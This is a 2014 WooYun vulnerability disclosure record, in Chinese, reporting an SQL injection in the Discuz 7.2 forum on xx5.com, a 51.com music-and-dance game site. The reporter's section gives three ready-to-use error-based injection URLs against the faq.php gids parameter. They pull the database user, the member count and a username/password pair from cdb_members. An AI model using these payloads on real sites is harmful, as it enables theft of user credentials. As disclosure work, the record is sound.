51某分站SQL注射漏洞(620多万用户)

编号67060
Urlhttp://www.wooyun.org/bug.php?action=view&id=67060
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题51某分站SQL注射漏洞(620多万用户)
漏洞类型SQL注射漏洞
厂商51.com
白帽子路人甲
提交日期2014-07-02 20:25:00
公开日期2014-07-07 20:26:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank0
漏洞简介
None
漏洞细节

DZ 7.2爆发了SQL注射漏洞,大家都在刷,我也来刷一下

http://www.xx5.com/bbs/index.php 51旗下大型音乐舞蹈网游


02.jpg


http://www.xx5.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20(select%20(select%20concat(username,0x27,password)%20from%20cdb_members%20limit%201)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23


03.jpg


http://www.xx5.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23


04.jpg


POC

600万用户,未深入,可自查log。尽快修复把,以免被黑客脱裤~

http://www.xx5.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20(select%20(select%20count(*)%20uid%20from%20cdb_members)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23


05.jpg

修复方案

状态信息 2014-07-02: 细节已通知厂商并且等待厂商处理中
2014-07-07: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None
回应信息危害等级:无影响厂商忽略忽略时间:2014-07-07 20:26